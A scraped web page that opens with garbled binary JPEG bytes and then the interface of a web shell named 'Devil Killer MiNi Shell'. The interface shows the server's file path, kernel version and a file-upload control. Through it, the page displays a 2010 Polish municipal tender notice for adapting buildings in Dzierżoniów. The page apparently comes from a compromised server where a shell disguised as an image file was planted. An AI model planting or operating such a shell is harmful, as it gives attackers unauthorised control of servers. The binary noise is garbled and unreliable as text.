JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20101129/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20101129/340863-N-2010.html

<p class="kh_header"><b>Dzierżoniów: Wykonanie robót budowlanych związanych z realizacją projektu p.n. lokalny Program Rewitalizacji-Adaptacja budynków przy ul. Nowowiejskiej 88 na Centrum Środowiskowego Domu Samopomocy oraz Centrum Aktywizacji Społecznej w ramach Priorytetu Nr 9 Odnowa zdegradowanych obszarów miejskich na terenie Dolnego Śląska Działania Nr 9.1 Odnowa zdegradowanych obszarów miejskich w miastach powyżej 10 Tysięcy mieszkańców</b><br>
<b>Numer ogłoszenia: 340863 - 2010; data zamieszczenia: 29.11.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Miejska Dzierżoniów , Rynek 1, 58-200 Dzierżoniów, woj. dolnośląskie, tel. 074 6450800, faks 074 6450801.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.dzierzoniow.pl</li><li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> Nie przewiduje się ustanowienia dynamicznego systemu zakupów.</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wykonanie robót budowlanych związanych z realizacją projektu p.n. lokalny Program Rewitalizacji-Adaptacja budynków przy ul. Nowowiejskiej 88 na Centrum Środowiskowego Domu Samopomocy oraz Centrum Aktywizacji Społecznej w ramach Priorytetu Nr 9 Odnowa zdegradowanych obszarów miejskich na terenie Dolnego Śląska Działania Nr 9.1 Odnowa zdegradowanych obszarów miejskich w miastach powyżej 10 Tysięcy mieszkańców.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiot zamówienia obejmuje roboty objęte dofinansowaniem i decyzjami o pozwoleniu na budowę nr 185/2008 z dn. 08.04.2008 r., 374/2009 z dn. 19.06.2009 r. oraz 589/2009 
z dn. 08.09.2009 r. - obejmuje adaptację budynków przy 
ul. Nowowiejskiej 88 na Centrum Środowiskowego Domu Samopomocy ( ŚDS) oraz Centrum Aktywizacji Społecznej ( CAS) wraz z zagospodarowaniem terenu, w tym wykonaniem parkingu wraz z oświetleniem terenu, przyłączy kanalizacji deszczowej i sanitarnej, wody, gazowej, wewnętrznej linii zasilającej budynki ( ŚDS i CAS zgodnie z decyzją o pozwoleniu na budowę nr 589/2009) 
Parametry techniczne budynków po adaptacji
	pow. użytkowa ŚDS/CAS - 303,05/530,31 m 2
	kubatura  ŚDS/CAS - 1060,70/3550,00 m3
	pow. zabudowy ŚDS/CAS - 471,40/290,00 m2
	ogólna pow. budynków poddana renowacji- 1129,05 m2
1.1: CAS - Roboty rozbiórkowe
W ramach robót rozbiórkowych planuje sie: skucie skorodowanych tynków, oczyszczenie ścian murowanych, likwidacja połączenia klatki schodowej części mieszkalnej z piwnicą, demontaż wypełnień między drewnianą konstrukcją ścian wewnętrznych poddasza, demontaż fragmentów ścian wewnętrznych w kondygnacji piwnicy, piętra i poddasza, demontaż warstw posadzkowych i podsufitki, demontaż warstw wykończeniowych posadzek oraz na zewnątrz budynku pochylni dla osób niepełnosprawnych i schodów zewnętrznych prowadzących z poziomu terenu do kotłowni w piwnicy.
1.2 CAS - Budowa i przebudowa instalacji wewnętrznych
W zakres instalacji wewnętrznych wchodzi: - instalacja wody zimnej, ciepłej i cyrkulacji, kanalizacji sanitarnej, instalacja grzewcza, kotłownia gazowa i wentylacja mechaniczna oraz instalacja strukturalnego okablowania komputerowego. Instalacje wewnętrzne zostaną wykonane z rur PP PN20 łączonych przez zgrzewanie. Źródłem ciepłej wody będzie podgrzewacz pojemnościowy V-10001 zlokalizowany w pom. kotłowni, a źródłem ciepła - kotłownia gazowa zlokalizowana w piwnicy. Rurociągi instalacji gazowej zostaną wykonane z rur stalowych czarnych łączonych ze sobą przez spawanie. Na wentylację mechaniczną składa sie wentylacja wywiewna z: sal dydaktycznych, kuchni, jadalni, magazynów żywności, sanitariatów, pomieszczeń biurowych oraz wentylacja nawiewna do: sal dydaktycznych, do kuchni i jadalni a także wentylacja pomieszczenia technicznego.
1.3 CAS - Przebudowa pomieszczeń i roboty wykończeniowe
W ramach tej kategorii wydatków zostanie wykonane: nowe tynki wraz z malowaniem farbami akrylowymi; nowe warstwy wykończeniowe posadzek - korytarze i klatki schodowe oraz pomieszczenia higieniczno-sanitarne, budowa i przebudowa sal, węzła sanitarnego, wymiana rynien i rur spustowych.
1.4 CAS - Prace związane z dostosowaniem obiektu do potrzeb osób niepełnosprawnych
W ramach tej kategorii wydatków zostanie wykonana platforma do przewożenia wózków sterowana elektrycznie a także na parterze toaleta dla osób niepełnosprawnych.
1.5 CAS - Termomodernizacja - docieplenie ścian i dachu
Zakres robót budowlanych w tej kategorii obejmuje: - wymianę pokrycia dachowego - dachówka karpiówka układana podwójnie, - docieplenie połaci dachowych wełną mineralną - 20 cm, 15 cm między krokwiami i dodatkowo 5 cm na stelażu systemowym RIGIPS; - renowacje uszkodzonych elementów więźby dachowej, ściany zewnętrzne docieplone styropianem granulowanym gr. 5 cm.
1.6 CAS - Termomodernizacja - stolarka okienna i drzwiowa
Zakres robót budowlanych w tej kategorii obejmuje: - wymianę stolarki okiennej: okna ościeżnicowe jednokrotnie malowane i oszklone fabrycznie, renowacje ościeżnic i skrzydeł okiennych podwójnych , wymianę skrzydeł drzwiowych płytowych wewnętrznych jednodzielnych pełnych, - wymianę skrzydeł drzwiowych płytowych wewnętrznych, wejściowych przeciwpożarowych, renowacja ościeżnic i skrzydeł wewnętrznych.
1.7 CAS- Termomodernizacja-kotłownia i pozostałe prace termomodernizacyjne
Zakres robót budowlanych w tej kategorii obejmuje: budowę kotłowni wyposażonej w kocioł kondensacyjny z zamkniętą komorą spalania o mocy nominalnej 90 KW, studzienka schładzająca o objętości 50 l. Bilans cieplny kotłowni gazowej to: ogrzewanie grzejnikowe, ciepło technologiczne do nagrzewnic wentylacyjnych i pojemnościowy podgrzewacz wody 80/60. Kategoria wydatków obejmuje zakup kotła o mocy 90 kW.
1.8 ŚDS - Roboty rozbiórkowe
Zakres prac rozbiórkowych obejmuje: rozbiórkę elementów budynku, likwidacje kanałów
technologicznych oraz całkowita rozbiórkę elementów maskownicy na budynku.
1.9 ŚDS - Budowa i przebudowa instalacji wewnętrznych
W ramach tej kategorii wydatków roboty dotyczą budowy i przebudowy: - inst. elektrycznej budynku, w tym wymiana linii zasilających kablowych, montaż skrzynek 
i rozdzielnic skrzynkowych, - inst. wewnętrznych, w tym: wodno-kanalizacyjnej; CO wodno-pompowej o temp. 75/600C z podłączeniem kotła gazowego wiszącego1-funkcyjnego o mocy13-30 kW typu Vitodens 100 lub równoważnego oraz inst. gazowej, wykonanej z rur miedzianych łączonych na lut twardy, doprowadzający do kotła gazowego 1-funkcyjnego oraz do 3 kuchenek gazowych 4-palnik. z piekarnikiem el.; - inst. oświetlenia wewnętrznego i zewnętrznego, - inst. odgromowej, - inst. wentylacyjnej, - inst. niskoprądowych - telefon, domofon, Internet oraz alarm. Kategoria wydatków obejmuje zakup kotła gazowego c.o., niezbędnego do funkcjonowania inst. gazowej w celu dostarczania ciepła do budynku oraz 3 kuchenek gazowych 4-palnik., niezbędnych do zajęć kulinarnych w ramach terapii zajęciowych, wpisanych do programu zajęć tej instytucji.
1.10 ŚDS - Przebudowa pomieszczeń i roboty wykończeniowe
Zakres prac tej kategorii wydatków obejmuje: modernizacje ścian wewnętrznych, posadzek w pomieszczeniach w formie płytek ceramicznych, w ciągach komunikacyjnych - płytki gresowe, stopnice i podstopnice ciągów komunikacyjnych - płytki ryflowane, modernizację balustrad, wykonanie obróbek blacharskich z blachy ocynkowanej.
1.11 ŚDS - Prace związane z dostosowaniem obiektu do potrzeb osób niepełnosprawnych
Zakres tej kategorii wydatków obejmuje: wykonanie pochwytu na wspornikach, uchwytów
umywalkowych i uchwytów WC oraz ustępów i umywalek wraz z osprzętem.
1.12 ŚDS - Termomodernizacja- docieplenie ścian i dachu 
W ramach tej kategorii wydatków zostanie wykonane: ocieplenie ścian zewnętrznych styropianem gr. 10 cm, docieplenie stropodachu 15 cm warstwa wełny mineralnej, pomalowanie konstrukcji drewnianych środkiem ognioochronnym.
1.13 ŚDS - Termomodernizacja - stolarka okienna i drzwiowa
W ramach tej kategorii wydatków zostanie wykonana: stolarka okienna z profili PCV, w tym, stolarka drzwiowa z profili PCV zewnętrzna, stolarka drzwiowa drewniana: - pełne indywidualne.
1.14 ŚDS - Termomodernizacja - pozostałe prace termomodernizacyjne
W ramach pozostałych prac termomodernizacyjnych zostaną wykonane wieńce i nadproża, ścianki działowe z cegły kratówki na zaprawie cementowo-wapiennej, w pomieszczeniach na parterze o podwyższonej wilgotności - obłożone terakotą a w ciągach komunikacyjnych, które są narażone na wzmożoną eksploatację - tynkiem mozaikowym żywicznym. Ponadto zostanie wykonana instalacja odgromowa i drenaż opaskowy.
1.15 Zagospodarowanie terenu zewnętrznego i parkingu
W ramach tej kategorii wydatków zostanie zmodernizowana: droga dojazdowa, chodniki, miejsca parkingowe, ogrodzenie, wykonanie zielonego skwerku wraz z nasadzeniami krzewów i trawnika. 
1.16 Przyłącze gazu
1.17 Przyłącza wodociągowe i kanalizacyjne.
2.  Ponadto wykonawca zobowiązany jest do:
2.1	przejęcia terenu budowy i jego zabezpieczenia,
2.2	organizacji zaplecza budowy,
2.3	zapewnienia dostawy niezbędnych mediów do realizacji robót i opłatę za ich dostawę,
2.4	uporządkowania terenu budowy i terenu przyległego po zakończeniu robót,
2.5	wywozu z rozbiórki mas mineralno-bitumicznych i ich utylizacji, np. w Wałbrzychu,
2.6	wywozu materiału i gruzu z rozbiórki wraz z jego składowaniem na składowisko odpadów (12 km od Dzierżoniowa) 
2.7	obsługi geodezyjnej  w trakcie realizacji robót budowlanych, jak i do wykonania pomiaru geodezyjnego powykonawczego dostarczonego również w formie elektronicznej na CD (skan sekcji mapy rozdzielczej 300DPJ i formacie TIF)
2.8	uzyskania decyzji administracyjnych i pokrycia kosztów uzgodnień związanych z realizacją zadania (w tym np. zajęcie pasa drogowego),
2.9	realizacji i poniesienia wszelkich kosztów związanych z realizacją i wypełnieniem wszystkich zobowiązań wynikających z decyzji, uzgodnień, postanowień, kwestionariuszy, warunków przyłączenia i opinii stanowiących integralną część projektu budowlanego,
2.10	zapewnienia wykonania i dostarczenia świadectwa charakterystyki energetycznej budynku sporządzonego w oparciu o obowiązujące przepisy prawne, 
2.11	wykonania badań i pomiarów w czasie wykonywania robót budowlanych i badań odbiorczych zgodnie ze specyfikacjami technicznymi wykonania i odbioru robót oraz wszystkich badań, sprawdzeń i pomiarów niezbędnych przy składania wniosku o udzielenie pozwolenia na użytkowanie w Inspektoracie Nadzoru Budowlanego  
2.12.	wykonania planu Bezpieczeństwa i Ochrony Zdrowia,
2.13	przedłożenia zamawiającemu w dniu przekazania placu budowy uzgodnienia 
w zakresie gospodarki odpadami, wydanego na podstawie ustawy o odpadach 
2.14	dostarczenia oświadczenia kierownika budowy o przeszkoleniu w zakresie BHP na stanowisku pracy pracowników zatrudnionych przy wykonywaniu robót związanych z realizacją przedmiotowego zamówienia w terminie 30 dni od daty przekazania placu budowy.
2.15	uczestnictwa kierownika budowy w cotygodniowych naradach, na których m.in. będzie kontrolowane stosowania wymogów związanych z ochroną środowiska i BHP; informujemy, że Urząd wdrożył normę środowiskową PN-EN-ISO 14001:2005 oraz  BHP PN-N-18001:2004,  
3. Szczegółowy zakres robót określają:
  - projekt budowlany i projekt wykonawczy Adaptacja budynku przy
        ul. Nowowiejskiej 88 na Środowiskowy Dom Samopomocy
  - projekt zagospodarowania działki przy ul. Nowowiejskiej 88
  - projekt budowlany sieci sanitarne, przyłącze wody, kanalizacji sanitarnej i gazu,
  -specyfikacja techniczna wykonania i odbioru robót Adaptacja budynku przy 
   ul. Nowowiejskiej 88 na Środowiskowy Dom Samopomocy 
   -specyfikacja techniczna wykonania i odbioru robót: Instalacje elektryczne  oraz    
   Przyłącze kanalizacji sanitarnej i gazu w adaptowanym budynku na Środowiskowy          
    Dom Samopomocy 
  - projekt budowlany - adaptacja budynku przy ul. Nowowiejskiej 88 na Centrum 
    Aktywizacji Społecznej
  - projekt zagospodarowania terenu - adaptacja budynku przy ul. Nowowiejskiej 88 na 
    Centrum Aktywizacji Społecznej
 - projekt budowlany sieci i przyłącza wody, kanalizacji deszczowej, wewnętrznych linii 
   zasilających - adaptacja budynku przy ul. Nowowiejskiej 88 na Centrum Aktywizacji 
   Społecznej
 - projekt wykonawczy architektura, konstrukcja - adaptacja budynku przy 
  ul. Nowowiejskiej 88 na Centrum Aktywizacji Społecznej
 - projekt wykonawczy instalacje sanitarne - adaptacja budynku przy ul. Nowowiejskiej 88  
   na Centrum Aktywizacji Społecznej
- projekt wykonawczy instalacje sanitarne sieci i przyłącza - adaptacja budynku przy
   ul. Nowowiejskiej 88 na Centrum Aktywizacji Społecznej
- projekt wykonawczy instalacje elektryczne - adaptacja budynku przy 
   ul. Nowowiejskiej 88 na Centrum Aktywizacji Społecznej
- specyfikacja wykonania i odbioru robót i instalacje elektryczne - adaptacja budynku przy  
  ul. Nowowiejskiej 88 na Centrum Aktywizacji Społecznej
- specyfikacja techniczna ST-IS-1 instalacje sanitarne - adaptacja budynku przy
   ul. Nowowiejskiej 88 na Centrum Aktywizacji Społecznej
 - ogólna specyfikacja techniczna warunków wykonania i odbioru przebudowy - adaptacji           
   budynku przy ul. Nowowiejskiej 88 na Centrum Aktywizacji Społecznej
  - decyzje o pozwoleniach na budowę nr 185/2008 z dn. 08.04.2008 r., 374/2009 z dn. 
     19.06.2009 r. oraz 589/2009 z dn. 08.09.2009 r..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.21.52.00-9, 45.26.27.00-8, 45.11.12.91-4, 45.30.00.00-0, 45.33.00.00-9.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 15.06.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Każda oferta musi być zabezpieczona wadium o wartości 50 000, 00 zł.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Nie dotyczy</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>wykazanie w załączniku nr 6 do SIWZ robót budowlanych w zakresie budowy, przebudowy, remontu obiektów kubaturowych o kubaturze min. 3000 m3 wykazanie min. 2 takich robót o wartości min 2.000.000 zł brutto każda z nich wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert w postępowaniu, 
a jeżeli okres prowadzenia działalności jest krótszy w tym okresie, z podaniem jej rodzaju 
i wartości, daty i miejsca wykonania oraz załączenie dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone, 

Ocena spełnienia warunków wymaganych od Wykonawców zostanie dokonana wg formuły spełnia-nie spełnia.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Nie dotyczy</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>wykazanie w załączniku nr 5 do SIWZ osób, które będą kierować robotami budowlanymi w specjalności w specjalności konstrukcyjno-budowlanej, instalacyjnej 
w zakresie sieci, instalacji i urządzeń cieplnych wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych oraz instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych
 i elektroenergetycznych oraz drogowej wraz z podaniem informacji na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnego do wykonania zamówienia oraz informacji o podstawie dysponowania tymi osobami oraz złożenie oświadczenia, że osoby, które będą kierować robotami budowlanymi w tych branżach, posiadają wymagane uprawnienia, są wpisane do Izby Samorządu Zawodowego
 a zaświadczenie o wpisie do tej Izby są ważne na dzień otwarcia ofert oraz, że są wpisane do centralnego rejestru prowadzonego przez Głównego Inspektora Nadzoru Budowlanego -poprzez wypełnienie i podpisanie załącznika nr 5 do SIWZ. 
Ocena spełnienia warunków wymaganych od Wykonawców zostanie dokonana wg formuły spełnia-nie spełnia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Nie dotyczy</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

</ul></li>
<li>
</li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Możliwość wprowadzenia zmian umowy:
w zakresie terminu i wynagrodzenia:
- w przypadku błędów lub braków projektowych (z winy projektanta lub nie) jest konieczna zmiana technologii wykonania robót budowlanych bądź wykonania zamówień dodatkowych by obiekt mógł spełniać swoje przeznaczenie, 
- z powodu okoliczności siły wyższej np. wystąpienia zdarzenia losowego wywołanego przez czynniki zewnętrzne, którego nie można było przewiedzieć z pewnością w szczególności zagrażającego bezpośrednio życiu lub zdrowiu ludzi lub grożącego powstaniem szkody w znacznych rozmiarach,
-z powodu działań osób trzecich uniemożliwiających wykonanie prac, które to działania nie są konsekwencją winy którejkolwiek ze stron.
O wystąpieniu okoliczności mogących wpłynąć na zmianę terminów Wykonawca winien jest poinformować Zamawiającego pisemnie i natychmiast odnotować to w dzienniku budowy. Strony z powodów, jakie mogą wpływać na zmiany terminów wykonania robót, wyłączają niedogodności związane z pogodą, typową dla okresu wykonywania robót w miejscu budowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://bip.um.dzierzoniow.pl/pl/bip/przetargi/ogloszenia_przetargi /przetargi_inwestycje.<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zamawiającego.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 16.12.2010 godzina 10:00, miejsce: Urząd Miasta Dzierżoniów, ul Rynek 1, Biuro Obsługi Klienta, stanowisko A - Informacja.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt pn. lokalny Program Rewitalizacji-Adaptacja budynków przy ul. Nowowiejskiej 88 na Centrum Środowiskowego Domu Samopomocy oraz Centrum Aktywizacji Społecznej współfinansowany jest przez Unię Europejską ze środków Europejskiego Funduszu Rozwoju Regionalnego w ramach Regionalnego Programu Operacyjnego dla Województwa Dolnośląskiego na lata 2007 - 2013, Priorytet 9. Odnowa zdegradowanych obszarów miejskich na terenie Dolnego Śląska (Miasta), Działanie 9.1 Odnowa zdegradowanych obszarów miejskich w miastach powyżej 10 tysięcy mieszkańców..</p>
